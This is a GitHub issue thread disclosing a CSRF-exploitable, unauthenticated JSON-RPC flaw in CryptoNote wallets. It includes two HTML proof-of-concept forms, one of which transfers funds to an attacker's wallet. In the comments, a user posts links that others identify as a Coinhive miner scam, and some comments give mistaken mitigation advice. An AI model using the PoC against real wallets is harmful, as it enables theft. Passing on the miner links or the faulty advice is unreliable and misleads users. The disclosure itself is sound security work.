search

cryptonotefoundation / cryptonote

CryptoNote protocol implementation. This is the reference repository for starting a new CryptoNote currency. See /src/cryptonote_config.h
https://cryptonote.org/
990 stars 6.08k forks source link

Unauthenticated JSON-RPC API allows takeover of CryptoNote RPC wallets #172

Open Ayrx opened 6 years ago

Ayrx commented 6 years ago

The reference implementation of CryptoNote wallets start a JSON-RPC server listening on a localhost port that allows an attacker to execute wallet functions due to a lack of authentication.

An attacker may exploit this vulnerability to steal cryptocurrency from vulnerable wallets by directing users to visit a webpage hosting the exploit.

Affected Software

All cryptocurrencies that use the reference CryptoNote walletd and simplewallet implementations are vulnerable. Notable coins include Bytecoin and Aeon.

Description

The reference CryptoNote repository comes with two different wallets, simplewallet and walletd. Both wallets have JSON-RPC servers that are vulnerable to similar attacks. Even though the JSON-RPC servers are listening on localhost, they can be exploited via CSRF.

walletd

walletd has the JSON-RPC server enabled by default. The wallet binds to port 8070 by default.

The below proof-of-concept demonstrates the vulnerability by creating a new address in the walletd container.

<html>
<form action=http://127.0.0.1:8070/json_rpc method=post enctype="text/plain" >
    <input name='{"params":{},"jsonrpc":"2.0","method":"createAddress", "ignore_me":"' value='test"}'type='hidden'>
<input type=submit>
</form>
</html>

simplewallet

simplewallet does not have the JSON-RPC server enabled by default. Enabling the server requires the --rpc-bind-port flag when invoking simplewallet.

The below proof-of-concept demonstrates the vulnerability by making a transfer from the running wallet to an attacker controlled wallet. Change the INSERT_AMOUNT and INSERT_WALLET_ADDRESS parameters when testing the POC. We assume that simplewallet was invoked with --rpc-bind-port 8111.

<html>
<form action=http://127.0.0.1:8111 method=post enctype="text/plain" >
        <input name='{"jsonrpc":"2.0","method":"transfer","params":{"destinations":[{"amount":INSERT_AMOUNT,"address":"INSERT_WALLET_ADDRESS"}],"fee":100,"mixin":0,"unlock_time":0}, "ignore_me":"' value='test"}'type='hidden'>
<input type=submit>
</form>
</html>

Notes on exploitation

While the proof-of-concept code assumes that the server is listening on a specific port, changing the running port does prevent exploitation. It is trivial to enumerate open ports with WebSocket.

The proof-of-concept uses a HTML form to demonstrate the attack. However, exploiting this over Javascript is not an issue due to a lack of CSRF protection.

Recommended Fix

The JSON-RPC servers should be patched to require authentication on every request. It is recommended that all forks of CryptoNote and ByteCoin apply a patch similar to the Turtlecoin fix.

SoraKohaku commented 6 years ago

no official anymore we make this grow up. but my team already share cryptonote with original team as copyright. and we next step on Ruby[our codename] to next fixed security issue. See : https://cnhv.co/1lg50 or go our web[https://cnhv.co/dyrf] same as original we keep free they distibute or did change on code. Hope our[cryptonote] family grow~

On Feb 5, 2018 5:10 PM, "Terry Chia" notifications@github.com wrote:

Hi, I found a vulnerability in CryptoNote. Please send me an email at terrycwk1994 [at] gmail.com, as well as respond to this issue so that I know the email is from a legitimate developer.

— You are receiving this because you are subscribed to this thread. Reply to this email directly, view it on GitHub https://github.com/cryptonotefoundation/cryptonote/issues/172, or mute the thread https://github.com/notifications/unsubscribe-auth/AK51tQF3dQP_b6j-0PyJyBWV-8_MspAzks5tRreCgaJpZM4R5DZk .

nnamon commented 6 years ago

For those reading the above, the links are malicious and point to a coinhive miner.

Could at least bother with proper english if they wanted to scam people into browser mining for them.

SoraKohaku commented 6 years ago

actually they pay monero. hmmm just go to nur1labs.net then. im not scammed you just for some little cash lol. or go github mine just click my picture. see DirhamCli we did all good works to new cryptonote evolution tech~

On Feb 5, 2018 7:22 PM, "nnamon" notifications@github.com wrote:

For those reading the above, the links are malicious and point to a coinhive miner.

Piece of shit could at least bother with proper english if they wanted to scam people into browser mining for them.

— You are receiving this because you commented. Reply to this email directly, view it on GitHub https://github.com/cryptonotefoundation/cryptonote/issues/172#issuecomment-363041833, or mute the thread https://github.com/notifications/unsubscribe-auth/AK51tb318j2wVNArbNGLr0MjaJu5mIckks5tRtZSgaJpZM4R5DZk .

rainmanp7 commented 6 years ago

cnhv<~doesn't this equate to coin hive miner website? Then the after mention is your personal account ,to get paid? . Does that seem like a legitimate help in your mind?

Doestoievski commented 6 years ago

@Ayrx Make a pull request.

SoraKohaku commented 6 years ago

PR can did but that cannot merge. lol i try some~

On Feb 6, 2018 4:42 PM, "Doestoievski" notifications@github.com wrote:

@Ayrx https://github.com/ayrx Make a pull request.

— You are receiving this because you commented. Reply to this email directly, view it on GitHub https://github.com/cryptonotefoundation/cryptonote/issues/172#issuecomment-363337104, or mute the thread https://github.com/notifications/unsubscribe-auth/AK51tVYe690C7Yjd6sUxuRqiajRaECMxks5tSAJVgaJpZM4R5DZk .

Ayrx commented 6 years ago

As there have been no response by an official developer in 7 days, I am publishing the details of this vulnerability. A CVE ID has been requested from MITRE and will be updated here when one is assigned. The same report is duplicated at: https://www.ayrx.me/cryptonote-unauthenticated-json-rpc

jared201 commented 6 years ago

@Ayrx no patch needed, just don't bind the RPC daemon to 0.0.0.0 , use 127.0.0.1 from your web wallet so no external exploitation is possible, Desktop Wallets should be deprecated, they're obsolete. it's really that simple.

Ayrx commented 6 years ago

@jared201 Exploitation is still possible via CSRF even if the daemon is bound only to 127.0.0.1.

jared201 commented 6 years ago

@Ayrx not really, via https, just don't allow unnecessary GET requests coming to your website directly

SoraKohaku commented 6 years ago

used post instead get @_@

On Feb 12, 2018 10:46 AM, "Jared Odulio" notifications@github.com wrote:

@Ayrx https://github.com/ayrx not really, via https, just don't allow unnecessary GET requests coming to your website directly

— You are receiving this because you commented. Reply to this email directly, view it on GitHub https://github.com/cryptonotefoundation/cryptonote/issues/172#issuecomment-364812035, or mute the thread https://github.com/notifications/unsubscribe-auth/AK51tWwLFv34b6jzyBQuMynjnoUSrTwnks5tT5gGgaJpZM4R5DZk .

keylength commented 6 years ago

The 7 day disclosure window and flaming cryptonote gif are a bit much xD

jared201 commented 6 years ago

@keylength

i guess that JSON-RPC "security" issue is not really new, everyone from Monero to Bytecoin guys already knew that, except that they are silent about it.

SoraKohaku commented 6 years ago

i used json from xdn and they fixed it xD

On Feb 13, 2018 12:23 PM, "Jared Odulio" notifications@github.com wrote:

@keylength https://github.com/keylength

i guess that JSON-RPC "security" issue is not really new, everyone from Monero to Bytecoin guys already knew that, except that they are silent about it.

— You are receiving this because you commented. Reply to this email directly, view it on GitHub https://github.com/cryptonotefoundation/cryptonote/issues/172#issuecomment-365139375, or mute the thread https://github.com/notifications/unsubscribe-auth/AK51tYnGIRbP_GOvbn-Cmd9Ltpr68EgAks5tUQArgaJpZM4R5DZk .

jared201 commented 6 years ago

@FndNur1Labs this issue is really serious if you're offering desktop wallets which MUST do RPC calls via public IP or FQDN. However if you're developing web wallets, all you need is to "harden" your code by not making RPC calls from the client-side javascript, which most browsers will warn or not allow you to. Instead, you should use your JS framework's server-side RPC calls (e.g. Meteor.call() or something similar) , and those RPC calls should only be connecting locally(127.0.0.1). CSRF'ing is nearly impossible, unless you allow a 'router' to do that.

SoraKohaku commented 6 years ago

@jared like back port example private udp and tcp ones?for js not lack is script not leaked. yes harden code mean improved some code to lack of private ones. i made some experiment about cross-chain will be better or maybe will leaked bot chain. that it. for chain protect not shared key private~used sha or md5[web]

On Feb 13, 2018 5:14 PM, "Jared Odulio" notifications@github.com wrote:

@FndNur1Labs https://github.com/fndnur1labs this issue is really serious if you're offering desktop wallets which MUST do RPC calls via public IP or FQDN. However if you're developing web wallets, all you need is to "harden" your code by not making RPC calls from the client-side javascript, which most browsers will warn or not allow you to. Instead, you should use your JS framework's server-side RPC calls (e.g. Meteor.call() or something similar) , and those RPC calls should only be connecting locally(127.0.0.1). CSRF'ing is nearly impossible, unless you allow a 'router' to do that.

— You are receiving this because you were mentioned. Reply to this email directly, view it on GitHub https://github.com/cryptonotefoundation/cryptonote/issues/172#issuecomment-365182693, or mute the thread https://github.com/notifications/unsubscribe-auth/AK51tRkMxx65tnygyVFoc_ZZNX_2Hsd0ks5tUURZgaJpZM4R5DZk .